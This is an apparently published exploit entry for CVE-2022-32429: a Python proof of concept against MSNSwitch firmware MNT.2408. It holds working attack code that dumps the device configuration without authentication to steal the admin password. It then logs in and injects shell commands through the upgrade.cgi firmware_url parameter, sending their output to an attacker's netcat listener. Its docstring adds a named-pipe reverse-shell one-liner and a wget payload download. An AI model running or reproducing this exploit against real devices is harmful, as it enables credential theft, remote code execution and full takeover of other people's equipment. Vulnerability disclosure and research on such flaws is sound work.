MSNSwitch Firmware MNT.2408 Remote Code Execution

`Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)  
Google Dork: n/a  
Date:9/1/2022  
Exploit Author: Eli Fulkerson  
Vendor Homepage: https://www.msnswitch.com/  
Version: MNT.2408  
Tested on: MNT.2408 firmware  
CVE: CVE-2022-32429  
  
#!/usr/bin/python3  
  
  
"""  
  
POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.  
  
Configuration dump only requires HTTP access.  
Full RCE requires you to be on the same subnet as the device.  
  
"""   
  
import requests  
import sys  
import urllib.parse  
import readline  
import random  
import string  
  
  
# listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOST  
LISTENER_HOST = "192.168.EDIT.ME"  
LISTENER_PORT = 3434  
  
# target msnswitch  
TARGET="192.168.EDIT.ME2"  
PORT=80  
  
USERNAME = None  
PASSWORD = None  
  
"""  
First vulnerability, unauthenticated configuration/credential dump  
"""  
if USERNAME == None or PASSWORD == None:  
# lets just ask  
hack_url=f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh"  
session = requests.session()  
  
data = session.get(hack_url)  
for each in data.text.split('\n'):  
key = None  
val = None  
  
try:  
key = each.strip().split('=')[0]  
val = each.strip().split('=')[1]  
except:  
pass  
  
if key == "Account1":  
USERNAME = val  
if key == "Password1":  
PASSWORD = val  
  
"""  
Second vulnerability, authenticated command execution  
  
This only works on the local lan.  
  
for full reverse shell, modify and upload netcat busybox shell script to /tmp:  
  
shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f  
download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmp  
  
ref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox  
"""  
  
session = requests.session()  
  
# initial login, establishes our Cookie  
burp0_url = f"http://{TARGET}:{PORT}/goform/login"  
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}  
burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD}  
session.post(burp0_url, headers=burp0_headers, data=burp0_data)  
  
# get our csrftoken  
burp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp"  
data = session.get(burp0_url)  
  
csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0]  
  
while True:  
CMD = input('x:')  
CMD_u = urllib.parse.quote_plus(CMD)  
filename = ''.join(random.choice(string.ascii_letters) for _ in range(25))  
  
try:  
hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}"  
  
session.get(hack_url, timeout=0.01)  
except requests.exceptions.ReadTimeout:  
pass  
  
`